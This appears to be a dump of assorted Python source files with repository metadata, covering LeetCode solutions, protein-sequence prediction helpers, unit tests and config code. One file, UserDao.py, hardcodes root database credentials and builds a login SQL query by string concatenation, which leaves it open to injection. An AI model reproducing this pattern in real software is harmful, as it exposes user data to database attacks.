# A gene must be in the bank to make it a valid gene string.
#
# Now, given 3 things - start, end, bank,
# your task is to determine what is the minimum number of mutations needed to
# mutate from "start" to "end". If there is no such a mutation, return -1.
#
# NOTE: 1. Starting point is assumed to be valid, so it might not be included in the bank.
# 2. If multiple mutations are needed, all mutations during in the sequence must be valid.
#
# For example,
#
# bank: "AACCGGTA"
# start: "AACCGGTT"
# end: "AACCGGTA"
# return: 1
#
# bank: "AACCGGTA", "AACCGCTA", "AAACGGTA"
# start: "AACCGGTT"
# end: "AAACGGTA"
# return: 2
#
# bank: "AAAACCCC", "AAACCCCC", "AACCCCCC"
# start: "AAAAACCC"
# end: "AACCCCCC"
# return: 3
from collections import deque
class Solution(object):
def minMutation(self, start, end, bank):
"""
:type start: str
:type end: str
:type bank: List[str]
:rtype: int
"""
lookup = {}
for b in bank:
lookup[b] = False
q = deque([(start, 0)])
while q:
cur, level = q.popleft()
if cur == end:
return level
for i in xrange(len(cur)):
for c in ['A', 'T', 'C', 'G']:
if cur[i] == c:
continue
next_str = cur[:i] + c + cur[i+1:]
if next_str in lookup and lookup[next_str] == False:
q.append((next_str, level+1))
lookup[next_str] = True
return -1
| 0 | 791 | 23 |
9d9248278db76a02b22d0694ae1d459fdc67c814 | 6,168 | py | Python | run_predictions/evoef2_dataset.py | universvm/sequence-recovery-benchmark | 7160c68a8bee8870e169e2e1010c0964c3fe62b0 | [
"MIT"
] | 1 | 2021-08-01T21:23:21.000Z | 2021-08-01T21:23:21.000Z | run_predictions/evoef2_dataset.py | universvm/sequence-recovery-benchmark | 7160c68a8bee8870e169e2e1010c0964c3fe62b0 | [
"MIT"
] | 10 | 2021-05-05T12:01:53.000Z | 2021-09-01T16:45:18.000Z | run_predictions/evoef2_dataset.py | universvm/sequence-recovery-benchmark | 7160c68a8bee8870e169e2e1010c0964c3fe62b0 | [
"MIT"
] | 1 | 2021-08-14T14:26:16.000Z | 2021-08-14T14:26:16.000Z | """Functions for making EvoEF2 predictions."""
import ampal
import gzip
import glob
import subprocess
import multiprocessing
import os
from pathlib import Path
from benchmark import config
from sklearn.preprocessing import OneHotEncoder
import warnings
import numpy as np
import pandas as pd
def run_Evo2EF(
pdb: str, chain: str, number_of_runs: str, working_dir: Path, path_to_evoef2: Path
) -> None:
"""Runs a shell script to predict sequence with EvoEF2
Patameters
----------
path: str
Path to PDB biological unit.
pdb: str
PDB code.
chain: str
Chain code.
number_of_runs: str
Number of sequences to be generated.
working_dir: str
Dir where to store temporary files and results.
path_to_EvoEF2: Path
Location of EvoEF2 executable.
"""
print(f"Starting {pdb}{chain}.")
# evo.sh must be in the same directory as this file.
p = subprocess.Popen(
[
os.path.dirname(os.path.realpath(__file__)) + "/evo.sh",
pdb,
chain,
number_of_runs,
working_dir,
path_to_evoef2,
]
)
p.wait()
print(f"{pdb}{chain} done.")
def multi_Evo2EF(
df: pd.DataFrame,
number_of_runs: int,
working_dir: Path,
path_to_assemblies: Path,
path_to_evoef2: Path,
max_processes: int = 8,
nmr:bool = False,
) -> None:
"""Runs Evo2EF on all PDB chains in the DataFrame.
Parameters
----------
df: pd.DataFrame
DataFrame with PDB and chain codes.
number_of_runs: int
Number of sequences to be generated for each PDB file.
max_processes: int = 8
Number of cores to use, default is 8.
working_dir: Path
Dir where to store temporary files and results.
path_to_assemblies: Path
Dir with biological assemblies.
path_to_EvoEF2: Path
Location of EvoEF2 executable.
nmr:bool=True
"""
inputs = []
# remove duplicated chains
df = df.drop_duplicates(subset=["PDB", "chain"])
# check if working directory exists. Make one if doesn't exist.
if not working_dir.exists():
os.makedirs(working_dir)
if not (working_dir / "results/").exists():
os.makedirs(working_dir / "results/")
print(f"{df.shape[0]} structures will be predicted.")
for i, protein in df.iterrows():
if not nmr:
with gzip.open(
path_to_assemblies / protein.PDB[1:3] / f"{protein.PDB}.pdb1.gz"
) as file:
assembly = ampal.load_pdb(file.read().decode(), path=False)
# fuse all states of the assembly into one state to avoid EvoEF2 errors.
empty_polymer = ampal.Assembly()
chain_id = []
for polymer in assembly:
for chain in polymer:
empty_polymer.append(chain)
chain_id.append(chain.id)
# relabel chains to avoid repetition, remove ligands.
str_list = string.ascii_uppercase.replace(protein.chain, "")
index = chain_id.index(protein.chain)
chain_id = list(str_list[: len(chain_id)])
chain_id[index] = protein.chain
empty_polymer.relabel_polymers(chain_id)
pdb_text = empty_polymer.make_pdb(alt_states=False, ligands=False)
# writing new pdb with AMPAL fixes most of the errors with EvoEF2.
with open((working_dir / protein.PDB).with_suffix(".pdb1"), "w") as pdb_file:
pdb_file.write(pdb_text)
#pick first nmr structure
else:
with gzip.open(
path_to_assemblies / protein.PDB[1:3] / f"pdb{protein.PDB}.ent.gz"
) as file:
assembly = ampal.load_pdb(file.read().decode(), path=False)
pdb_text = assembly[0].make_pdb(alt_states=False)
# writing new pdb with AMPAL fixes most of the errors with EvoEF2.
with open((working_dir / protein.PDB).with_suffix(".pdb1"), "w") as pdb_file:
pdb_file.write(pdb_text)
inputs.append(
(
protein.PDB,
protein.chain,
str(number_of_runs),
working_dir,
path_to_evoef2,
)
)
with multiprocessing.Pool(max_processes) as P:
P.starmap(run_Evo2EF, inputs)
def seq_to_arr(working_dir: Path, user_list: Path, ignore_uncommon:bool=True):
"""Produces prediction format compatible with the benchmarking tool.
working_dir: Path
Dir where EvoEF2 results are stored.
user_list: Path
Path to .txt file with protein chains to include in the benchmark"""
with open(Path(user_list)) as file:
chains=[x.strip('\n') for x in file.readlines()]
predicted_sequences = []
path = Path(working_dir)
enc=OneHotEncoder(categories=[config.acids],sparse=False)
with open(path/'datasetmap.txt','w') as file:
file.write(f"ignore_uncommon {ignore_uncommon}\ninclude_pdbs\n##########\n")
for protein in chains:
prediction_path = path / "results"/f"{protein}.txt"
# check for empty and missing files
if prediction_path.exists() and os.path.getsize(prediction_path) > 0:
with open(prediction_path) as prediction:
seq = prediction.readline().split()[0]
if seq != "0":
predicted_sequences+=list(seq)
file.write(f"{protein} {len(seq)}\n")
else:
warnings.warn(
f"EvoEF2: {protein} prediction does not exits, EvoEF2 returned 0."
)
else:
warnings.warn(
f"EvoEF2: {protein} prediction does not exits."
)
arr=enc.fit_transform(np.array(predicted_sequences).reshape(-1, 1))
pd.DataFrame(arr).to_csv(path/"evoEF2.csv", header=None, index=None)
| 34.651685 | 94 | 0.584468 | """Functions for making EvoEF2 predictions."""
import ampal
import gzip
import glob
import subprocess
import multiprocessing
import os
from pathlib import Path
from benchmark import config
from sklearn.preprocessing import OneHotEncoder
import warnings
import numpy as np
import pandas as pd
def run_Evo2EF(
pdb: str, chain: str, number_of_runs: str, working_dir: Path, path_to_evoef2: Path
) -> None:
"""Runs a shell script to predict sequence with EvoEF2
Patameters
----------
path: str
Path to PDB biological unit.
pdb: str
PDB code.
chain: str
Chain code.
number_of_runs: str
Number of sequences to be generated.
working_dir: str
Dir where to store temporary files and results.
path_to_EvoEF2: Path
Location of EvoEF2 executable.
"""
print(f"Starting {pdb}{chain}.")
# evo.sh must be in the same directory as this file.
p = subprocess.Popen(
[
os.path.dirname(os.path.realpath(__file__)) + "/evo.sh",
pdb,
chain,
number_of_runs,
working_dir,
path_to_evoef2,
]
)
p.wait()
print(f"{pdb}{chain} done.")
def multi_Evo2EF(
df: pd.DataFrame,
number_of_runs: int,
working_dir: Path,
path_to_assemblies: Path,
path_to_evoef2: Path,
max_processes: int = 8,
nmr:bool = False,
) -> None:
"""Runs Evo2EF on all PDB chains in the DataFrame.
Parameters
----------
df: pd.DataFrame
DataFrame with PDB and chain codes.
number_of_runs: int
Number of sequences to be generated for each PDB file.
max_processes: int = 8
Number of cores to use, default is 8.
working_dir: Path
Dir where to store temporary files and results.
path_to_assemblies: Path
Dir with biological assemblies.
path_to_EvoEF2: Path
Location of EvoEF2 executable.
nmr:bool=True
"""
inputs = []
# remove duplicated chains
df = df.drop_duplicates(subset=["PDB", "chain"])
# check if working directory exists. Make one if doesn't exist.
if not working_dir.exists():
os.makedirs(working_dir)
if not (working_dir / "results/").exists():
os.makedirs(working_dir / "results/")
print(f"{df.shape[0]} structures will be predicted.")
for i, protein in df.iterrows():
if not nmr:
with gzip.open(
path_to_assemblies / protein.PDB[1:3] / f"{protein.PDB}.pdb1.gz"
) as file:
assembly = ampal.load_pdb(file.read().decode(), path=False)
# fuse all states of the assembly into one state to avoid EvoEF2 errors.
empty_polymer = ampal.Assembly()
chain_id = []
for polymer in assembly:
for chain in polymer:
empty_polymer.append(chain)
chain_id.append(chain.id)
# relabel chains to avoid repetition, remove ligands.
str_list = string.ascii_uppercase.replace(protein.chain, "")
index = chain_id.index(protein.chain)
chain_id = list(str_list[: len(chain_id)])
chain_id[index] = protein.chain
empty_polymer.relabel_polymers(chain_id)
pdb_text = empty_polymer.make_pdb(alt_states=False, ligands=False)
# writing new pdb with AMPAL fixes most of the errors with EvoEF2.
with open((working_dir / protein.PDB).with_suffix(".pdb1"), "w") as pdb_file:
pdb_file.write(pdb_text)
#pick first nmr structure
else:
with gzip.open(
path_to_assemblies / protein.PDB[1:3] / f"pdb{protein.PDB}.ent.gz"
) as file:
assembly = ampal.load_pdb(file.read().decode(), path=False)
pdb_text = assembly[0].make_pdb(alt_states=False)
# writing new pdb with AMPAL fixes most of the errors with EvoEF2.
with open((working_dir / protein.PDB).with_suffix(".pdb1"), "w") as pdb_file:
pdb_file.write(pdb_text)
inputs.append(
(
protein.PDB,
protein.chain,
str(number_of_runs),
working_dir,
path_to_evoef2,
)
)
with multiprocessing.Pool(max_processes) as P:
P.starmap(run_Evo2EF, inputs)
def seq_to_arr(working_dir: Path, user_list: Path, ignore_uncommon:bool=True):
"""Produces prediction format compatible with the benchmarking tool.
working_dir: Path
Dir where EvoEF2 results are stored.
user_list: Path
Path to .txt file with protein chains to include in the benchmark"""
with open(Path(user_list)) as file:
chains=[x.strip('\n') for x in file.readlines()]
predicted_sequences = []
path = Path(working_dir)
enc=OneHotEncoder(categories=[config.acids],sparse=False)
with open(path/'datasetmap.txt','w') as file:
file.write(f"ignore_uncommon {ignore_uncommon}\ninclude_pdbs\n##########\n")
for protein in chains:
prediction_path = path / "results"/f"{protein}.txt"
# check for empty and missing files
if prediction_path.exists() and os.path.getsize(prediction_path) > 0:
with open(prediction_path) as prediction:
seq = prediction.readline().split()[0]
if seq != "0":
predicted_sequences+=list(seq)
file.write(f"{protein} {len(seq)}\n")
else:
warnings.warn(
f"EvoEF2: {protein} prediction does not exits, EvoEF2 returned 0."
)
else:
warnings.warn(
f"EvoEF2: {protein} prediction does not exits."
)
arr=enc.fit_transform(np.array(predicted_sequences).reshape(-1, 1))
pd.DataFrame(arr).to_csv(path/"evoEF2.csv", header=None, index=None)
| 0 | 0 | 0 |
dd53ed3751b7fee2e266a9089ec0745853587c76 | 618 | py | Python | delivery/algorithm/genetic/chromosome.py | luist18/feup-iart-proj1 | eebd88bbd55ff96b9c6fbab3863663ca47472de4 | [
"MIT"
] | 1 | 2021-03-11T16:38:42.000Z | 2021-03-11T16:38:42.000Z | delivery/algorithm/genetic/chromosome.py | luist18/feup-iart-proj1 | eebd88bbd55ff96b9c6fbab3863663ca47472de4 | [
"MIT"
] | null | null | null | delivery/algorithm/genetic/chromosome.py | luist18/feup-iart-proj1 | eebd88bbd55ff96b9c6fbab3863663ca47472de4 | [
"MIT"
] | null | null | null | """Holds the chromosome class and helper functions.
Classes:
Chromosome
Functions:
valid_append(List[Path], Path)
valid_insert(List[Path], Path)
"""
class Chromosome:
"""Represents a solution to the problem.
Holds the solution and its fitness/evaluation.
"""
def __init__(self, solution, fitness):
"""Instantiates a chromosome.
...
Args:
solution (List[Path]): The list of paths/steps of a solution
fitness (integer): The fitness/evaluation of the solution
"""
self.solution = solution
self.fitness = fitness
| 20.6 | 72 | 0.627832 | """Holds the chromosome class and helper functions.
Classes:
Chromosome
Functions:
valid_append(List[Path], Path)
valid_insert(List[Path], Path)
"""
class Chromosome:
"""Represents a solution to the problem.
Holds the solution and its fitness/evaluation.
"""
def __init__(self, solution, fitness):
"""Instantiates a chromosome.
...
Args:
solution (List[Path]): The list of paths/steps of a solution
fitness (integer): The fitness/evaluation of the solution
"""
self.solution = solution
self.fitness = fitness
| 0 | 0 | 0 |
6b110a59836850ca22799ff0f109f1da327710b0 | 635 | py | Python | DataBase/UserDao.py | y894577/FocusDiscrimination | b8c44cce0a0a61e5c86bcdbace970e5b7813c2a7 | [
"Apache-2.0"
] | 3 | 2020-03-26T01:41:27.000Z | 2021-04-29T06:53:29.000Z | DataBase/UserDao.py | y894577/FocusDiscrimination | b8c44cce0a0a61e5c86bcdbace970e5b7813c2a7 | [
"Apache-2.0"
] | 1 | 2020-09-28T01:35:19.000Z | 2020-10-14T12:56:21.000Z | DataBase/UserDao.py | y894577/FocusDiscrimination | b8c44cce0a0a61e5c86bcdbace970e5b7813c2a7 | [
"Apache-2.0"
] | null | null | null | import pymysql.cursors
connection = pymysql.connect(host='localhost', port=3306, user='root', passwd='root', db='python_user',
charset='utf8mb4', cursorclass=pymysql.cursors.DictCursor)
| 27.608696 | 103 | 0.601575 | import pymysql.cursors
connection = pymysql.connect(host='localhost', port=3306, user='root', passwd='root', db='python_user',
charset='utf8mb4', cursorclass=pymysql.cursors.DictCursor)
def selectUser(userID, userPsw):
try:
cursor = connection.cursor()
sql = "select * from user where ID = " + userID + " and password= " + userPsw
cursor.execute(sql)
result = cursor.fetchall()
# print(results)
connection.close()
return result
except Exception:
print("error")
connection.close()
return
def insertUser():
pass | 372 | 0 | 46 |
150416b7298b0612d68334fd47515170e3caebcb | 1,808 | py | Python | tests/util/test_parseVocabularySources.py | unt-libraries/codalib | d3f2cdf3cc8e9aae14cfab00d1a6de760cc1220b | [
"BSD-3-Clause"
] | null | null | null | tests/util/test_parseVocabularySources.py | unt-libraries/codalib | d3f2cdf3cc8e9aae14cfab00d1a6de760cc1220b | [
"BSD-3-Clause"
] | 31 | 2015-06-15T22:50:50.000Z | 2021-09-30T14:14:51.000Z | tests/util/test_parseVocabularySources.py | unt-libraries/codalib | d3f2cdf3cc8e9aae14cfab00d1a6de760cc1220b | [
"BSD-3-Clause"
] | null | null | null | import json
from unittest.mock import mock_open, patch
import pytest
from codalib import util
def test_return_value():
"""
Test that parseVocabularySources returns a list of the correct length
where all elements are tuples.
"""
read_data = json.dumps({
'terms': [
{'name': 'foo', 'label': 'Foo'},
{'name': 'bar', 'label': 'Bar'},
{'name': 'baz', 'label': 'Baz'},
{'name': 'qux', 'label': 'Qux'}
]
})
m = mock_open(read_data=read_data)
with patch('codalib.util.open', m):
choices = util.parseVocabularySources('/foo/bar')
assert len(choices) == 4
# Verify that all elements of the list are tuples.
assert all([type(choice) is tuple for choice in choices])
def test_return_value_elements():
"""
Verify that the returned list elements contain the name and the label.
"""
read_data = json.dumps({
'terms': [
{'name': 'foo', 'label': 'Foo'}
]
})
m = mock_open(read_data=read_data)
with patch('codalib.util.open', m):
choices = util.parseVocabularySources('/foo/bar')
assert choices.pop() == ('foo', 'Foo')
@pytest.mark.xfail
def test_empty_file_does_not_raise_exception():
"""
Verify that an exception will not be raised if the file is empty.
"""
m = mock_open()
with patch('codalib.util.open', m):
util.parseVocabularySources('/foo/bar')
@pytest.mark.xfail
def test_empty_json_does_not_raise_exception():
"""
Verify that an exception will not be raised if the file has a json
object, but the object is empty.
"""
read_data = json.dumps({})
m = mock_open(read_data=read_data)
with patch('codalib.util.open', m):
util.parseVocabularySources('/foo/bar')
| 26.588235 | 74 | 0.61615 | import json
from unittest.mock import mock_open, patch
import pytest
from codalib import util
def test_return_value():
"""
Test that parseVocabularySources returns a list of the correct length
where all elements are tuples.
"""
read_data = json.dumps({
'terms': [
{'name': 'foo', 'label': 'Foo'},
{'name': 'bar', 'label': 'Bar'},
{'name': 'baz', 'label': 'Baz'},
{'name': 'qux', 'label': 'Qux'}
]
})
m = mock_open(read_data=read_data)
with patch('codalib.util.open', m):
choices = util.parseVocabularySources('/foo/bar')
assert len(choices) == 4
# Verify that all elements of the list are tuples.
assert all([type(choice) is tuple for choice in choices])
def test_return_value_elements():
"""
Verify that the returned list elements contain the name and the label.
"""
read_data = json.dumps({
'terms': [
{'name': 'foo', 'label': 'Foo'}
]
})
m = mock_open(read_data=read_data)
with patch('codalib.util.open', m):
choices = util.parseVocabularySources('/foo/bar')
assert choices.pop() == ('foo', 'Foo')
@pytest.mark.xfail
def test_empty_file_does_not_raise_exception():
"""
Verify that an exception will not be raised if the file is empty.
"""
m = mock_open()
with patch('codalib.util.open', m):
util.parseVocabularySources('/foo/bar')
@pytest.mark.xfail
def test_empty_json_does_not_raise_exception():
"""
Verify that an exception will not be raised if the file has a json
object, but the object is empty.
"""
read_data = json.dumps({})
m = mock_open(read_data=read_data)
with patch('codalib.util.open', m):
util.parseVocabularySources('/foo/bar')
| 0 | 0 | 0 |
69f110c398b313bd1108ae0bd5a94bc20d36ae19 | 1,735 | py | Python | WindNinja_learning/prm_windninja.py | louisletoumelin/wind_downscaling_cnn | 9d08711620db1ee1f472847f0e822c5f4eb1d300 | [
"W3C"
] | null | null | null | WindNinja_learning/prm_windninja.py | louisletoumelin/wind_downscaling_cnn | 9d08711620db1ee1f472847f0e822c5f4eb1d300 | [
"W3C"
] | 12 | 2021-11-30T16:56:05.000Z | 2021-12-13T16:26:31.000Z | WindNinja_learning/prm_windninja.py | louisletoumelin/wind_downscaling_cnn | 9d08711620db1ee1f472847f0e822c5f4eb1d300 | [
"W3C"
] | null | null | null | from utils_prm import select_cfg_file
| 34.019608 | 185 | 0.673775 | from utils_prm import select_cfg_file
def create_prm():
prm = {}
prm["stations"] = ["Col du Lac Blanc"]
# 2 August 2017 1h
prm["hour_begin"] = 6
prm["day_begin"] = 4
prm["month_begin"] = 8
prm["year_begin"] = 2017
# 31 May 2020 1h
prm["hour_end"] = 1
prm["day_end"] = 5
prm["month_end"] = 8
prm["year_end"] = 2017
prm["begin"] = f"{prm['year_begin']}-{prm['month_begin']}-{prm['day_begin']}"
prm["end"] = f"{prm['year_end']}-{prm['month_end']}-{prm['day_end']}"
# Parent directory
prm["working_directory"] = "C:/Users/louis/git/wind_downscaling_CNN/"
# Data
prm["data_path"] = prm["working_directory"] + "Data/1_Raw/"
# Topography
prm["topo_path"] = prm["data_path"] + "MNT/Copernicus/COP30_L93_cropped.tif"
prm["windninja_topo"] = 'C:/Users/louis/git/wind_downscaling_CNN/Data/2_Pre_processed/WindNinja/'
# WindNinja
prm["output_path"] = 'C:/Users/louis/git/wind_downscaling_CNN/Data/2_Pre_processed/WindNinja/'
prm["path_to_WindNinja"] = "C:/WindNinja/WindNinja-3.7.2/bin/"
prm["solver"] = "momentum" # "momentum" or "mass"
# Observations
prm["BDclim_stations_path"] = prm["working_directory"] + "Data/2_Pre_processed/WindNinja/" + "stations_with_nearest_neighbors.csv"
# AROME
prm["nwp_name"] = "AROME"
prm["AROME_files"] = [prm["data_path"]+"AROME/FORCING_alp_2017080106_2018080106_32bits.nc", prm["data_path"]+"AROME/FORCING_alp_2018080106_2019060106_32bits.nc"]
prm["AROME_files_temperature"] = [prm["data_path"]+"AROME/T2m_FORCING_alp_2017080106_2018080106_32bits.nc", prm["data_path"]+"AROME/T2m_FORCING_alp_2018080106_2019060106_32bits.nc"]
prm = select_cfg_file(prm)
return prm
| 1,673 | 0 | 23 |
c1c7b761d689247bf00866e84dba25fa6023c21a | 531 | py | Python | codes_/0572_Subtree_of_Another_Tree.py | SaitoTsutomu/leetcode | 4656d66ab721a5c7bc59890db9a2331c6823b2bf | [
"MIT"
] | null | null | null | codes_/0572_Subtree_of_Another_Tree.py | SaitoTsutomu/leetcode | 4656d66ab721a5c7bc59890db9a2331c6823b2bf | [
"MIT"
] | null | null | null | codes_/0572_Subtree_of_Another_Tree.py | SaitoTsutomu/leetcode | 4656d66ab721a5c7bc59890db9a2331c6823b2bf | [
"MIT"
] | null | null | null | # %% [572. *Subtree of Another Tree](https://leetcode.com/problems/subtree-of-another-tree/)
# 問題:tがsの部分木かどうかを返す
# 解法:再帰を用いる
| 37.928571 | 92 | 0.600753 | # %% [572. *Subtree of Another Tree](https://leetcode.com/problems/subtree-of-another-tree/)
# 問題:tがsの部分木かどうかを返す
# 解法:再帰を用いる
class Solution:
def isSubtree(self, s: TreeNode, t: TreeNode, just=False) -> bool:
if not s or not t:
return not s and not t
if not just and (self.isSubtree(s.left, t) or self.isSubtree(s.right, t)):
return True
return s.val == t.val and (
self.isSubtree(s.left, t.left, True)
and self.isSubtree(s.right, t.right, True)
)
| 364 | -6 | 48 |
4d392595fef585885f6c94d9636ef74c305befe4 | 2,246 | py | Python | software/python/potentiostat/setup.py | selvanair/potentiometer | 6a2bb8433e877ef663973ea9fe1e3798029e840a | [
"CC-BY-4.0",
"MIT"
] | null | null | null | software/python/potentiostat/setup.py | selvanair/potentiometer | 6a2bb8433e877ef663973ea9fe1e3798029e840a | [
"CC-BY-4.0",
"MIT"
] | 2 | 2020-07-19T19:41:50.000Z | 2021-05-11T05:51:50.000Z | software/python/potentiostat/setup.py | selvanair/potentiometer | 6a2bb8433e877ef663973ea9fe1e3798029e840a | [
"CC-BY-4.0",
"MIT"
] | null | null | null | """
iorodeo-potentiostat
---------------------
Python interface to IO Rodeo's Potentiostat Shield for the teensy 3.2 development
board.
Example
--------
.. code:: python
from potentiostat import Potentiostat
dev = Potentiostat('/dev/ttyACM0')
dev.set_curr_range('100uA')
dev.set_sample_period(10)
name = 'cyclic'
param = {
'quietValue' : 0.0,
'quietTime' : 1000,
'amplitude' : 2.0,
'offset' : 0.0,
'period' : 1000,
'numCycles' : 5,
'shift' : 0.0,
}
dev.set_param(name,param)
t,volt,curr = dev.run_test(name,display='pbar')
Install
--------
.. code:: bash
$ pip install iorodeo-potentiostat
Links
-----
* Documentation http://stuff.iorodeo.com/docs/potentiostat
* Download https://bitbucket.org/iorodeo/potentiostat
"""
from setuptools import setup, find_packages
from os import path
here = path.abspath(path.dirname(__file__))
setup(
name='iorodeo-potentiostat',
version='0.0.3',
description='Serial interface to IO Rodeo Potentiostat',
long_description=__doc__,
url='https://bitbucket.org/iorodeo/potentiostat',
author='Will Dickson',
author_email='will@iorodeo.com',
license='MIT',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering :: Chemistry',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Operating System :: POSIX',
'Operating System :: Microsoft :: Windows',
'Operating System :: MacOS :: MacOS X',
],
keywords='Serial interface for IO Rodeo Potentiostat',
packages=find_packages(exclude=['docs', 'tests', 'examples']),
install_requires=['pyserial','progressbar33'],
)
| 25.816092 | 82 | 0.60285 | """
iorodeo-potentiostat
---------------------
Python interface to IO Rodeo's Potentiostat Shield for the teensy 3.2 development
board.
Example
--------
.. code:: python
from potentiostat import Potentiostat
dev = Potentiostat('/dev/ttyACM0')
dev.set_curr_range('100uA')
dev.set_sample_period(10)
name = 'cyclic'
param = {
'quietValue' : 0.0,
'quietTime' : 1000,
'amplitude' : 2.0,
'offset' : 0.0,
'period' : 1000,
'numCycles' : 5,
'shift' : 0.0,
}
dev.set_param(name,param)
t,volt,curr = dev.run_test(name,display='pbar')
Install
--------
.. code:: bash
$ pip install iorodeo-potentiostat
Links
-----
* Documentation http://stuff.iorodeo.com/docs/potentiostat
* Download https://bitbucket.org/iorodeo/potentiostat
"""
from setuptools import setup, find_packages
from os import path
here = path.abspath(path.dirname(__file__))
setup(
name='iorodeo-potentiostat',
version='0.0.3',
description='Serial interface to IO Rodeo Potentiostat',
long_description=__doc__,
url='https://bitbucket.org/iorodeo/potentiostat',
author='Will Dickson',
author_email='will@iorodeo.com',
license='MIT',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering :: Chemistry',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Operating System :: POSIX',
'Operating System :: Microsoft :: Windows',
'Operating System :: MacOS :: MacOS X',
],
keywords='Serial interface for IO Rodeo Potentiostat',
packages=find_packages(exclude=['docs', 'tests', 'examples']),
install_requires=['pyserial','progressbar33'],
)
| 0 | 0 | 0 |
4b03ffd7aac5cf914459cbc12cde134a95a34337 | 5,402 | py | Python | src/memory_logic.py | m-toman/AudioGames | cb1802882bd74cc1510e809b6881e7bc563ae5d6 | [
"MIT"
] | 2 | 2015-11-18T08:31:30.000Z | 2015-11-18T09:16:41.000Z | src/memory_logic.py | m-toman/AudioGames | cb1802882bd74cc1510e809b6881e7bc563ae5d6 | [
"MIT"
] | null | null | null | src/memory_logic.py | m-toman/AudioGames | cb1802882bd74cc1510e809b6881e7bc563ae5d6 | [
"MIT"
] | 1 | 2019-11-21T03:07:39.000Z | 2019-11-21T03:07:39.000Z | #!/usr/bin/env python
# FTW Telecommunications Research Center Vienna (www.ftw.at)
# Dietmar Schabus (schabus@ftw.at)
# July 2014
# library imports
import datetime
import random
# imports from this project
import memory_config
import liblog
# ==============================================================================
# memory_logic.Logic
# ==============================================================================
| 39.144928 | 152 | 0.495742 | #!/usr/bin/env python
# FTW Telecommunications Research Center Vienna (www.ftw.at)
# Dietmar Schabus (schabus@ftw.at)
# July 2014
# library imports
import datetime
import random
# imports from this project
import memory_config
import liblog
def enum(*sequential, **named):
enums = dict(zip(sequential, range(len(sequential))), **named)
return type('Enum', (), enums)
# ==============================================================================
# memory_logic.Logic
# ==============================================================================
class GameLogic(object):
class Board(object):
def __init__(self, size):
self.size = size
self.fields = [0] * size
self.init_fields()
def init_fields(self):
# loop size / 2 memory objects and choose 2 fields for each
for memoryobject in range( 1, self.size / 2 + 1):
idx = random.choice( [ ele for ele in range(len(self.fields)) if self.fields[ele] == 0 ] )
self.fields[idx] = memoryobject
idx = random.choice( [ ele for ele in range(len(self.fields)) if self.fields[ele] == 0 ] )
self.fields[idx] = memoryobject
print self.fields
def __init__(self, sizename):
self.things = None
self.States = enum( 'SELECT_1', 'SELECT_2', 'FINISH' )
self.current_state = None
self.current_thing = None
self.size = memory_config.size[sizename]
# when the game logic changes this to True, the game should terminate
self.terminate = False
# create the board
self.board = self.Board( self.size )
def handle_event(self, eventstring):
if eventstring == '':
return None
#print 'eventstring: {}'.format(eventstring)
if eventstring == 'terminate':
self.terminate = True
return None
if eventstring == 'hardterminate':
self.terminate = True
return None
# get started
if eventstring == 'begin':
self.current_state = self.States.SELECT_1
self.field1 = None
self.field2 = None
self.current_thing = None
self.last_correct = None
self.starttime = datetime.datetime.now()
self.numsteps = 0
return 'select1'
# user selected a field
if eventstring.startswith( "field_" ):
fieldsel = int(eventstring[6:])
if self.board.fields[fieldsel] < 1 or fieldsel == self.field1:
liblog.log('user selected field {} which is already finished.'.format(fieldsel))
return 'wrongfield'
# user selected the first field
if self.current_state == self.States.SELECT_1:
liblog.log('user selected field1: {} ({}).'.format(fieldsel, self.things[self.board.fields[ fieldsel ]-1]))
self.field1 = fieldsel
self.current_thing = self.board.fields[fieldsel]
self.current_state = self.States.SELECT_2
return 'select2'
# user selected the second field
if self.current_state == self.States.SELECT_2:
liblog.log('user selected field2: {} ({}).'.format(fieldsel, self.things[self.board.fields[ fieldsel ]-1]))
self.field2 = fieldsel
self.current_thing = self.board.fields[fieldsel]
self.numsteps += 1
# see if fields match
if self.board.fields[ self.field1 ] == self.board.fields[ self.field2 ]:
liblog.log('user was correct with field1: {} ({}) and field2: {} ({}).'.format(
self.field1, self.things[self.board.fields[ self.field1 ]-1], self.field2, self.things[self.board.fields[ self.field2 ]-1]))
self.board.fields[ self.field1 ] = self.board.fields[ self.field2 ] = 0
self.last_correct = True
if sum(self.board.fields) == 0:
elapsedtime = datetime.datetime.now() - self.starttime
liblog.log('goal reached after {} steps and {} seconds'.format(
self.numsteps, elapsedtime.total_seconds()))
self.current_state = self.States.FINISH
return 'finished'
else:
liblog.log('user was wrong with field1: {} ({}) and field2: {} ({}).'.format(
self.field1, self.things[self.board.fields[ self.field1 ]-1], self.field2, self.things[self.board.fields[ self.field2 ]-1]))
self.last_correct = False
self.field1 = None
self.field2 = None
self.current_state = self.States.SELECT_1
return 'select1'
return None
| 4,703 | 210 | 45 |
c434b8b863f15707893deeb7b78b671225d534ce | 5,584 | py | Python | src/train.py | StarGazer1995/FCN-CD-PyTorch | 17f33470000a9bab6c5ea98bd3eba38f87868b2f | [
"BSD-2-Clause"
] | null | null | null | src/train.py | StarGazer1995/FCN-CD-PyTorch | 17f33470000a9bab6c5ea98bd3eba38f87868b2f | [
"BSD-2-Clause"
] | null | null | null | src/train.py | StarGazer1995/FCN-CD-PyTorch | 17f33470000a9bab6c5ea98bd3eba38f87868b2f | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python3
import argparse
import os
import shutil
import random
import ast
from os.path import basename, exists, splitext
import torch
import torch.backends.cudnn as cudnn
import numpy as np
import yaml
from core.trainers import CDTrainer
from utils.misc import OutPathGetter, Logger, register
if __name__ == '__main__':
main() | 35.341772 | 96 | 0.657772 | #!/usr/bin/env python3
import argparse
import os
import shutil
import random
import ast
from os.path import basename, exists, splitext
import torch
import torch.backends.cudnn as cudnn
import numpy as np
import yaml
from core.trainers import CDTrainer
from utils.misc import OutPathGetter, Logger, register
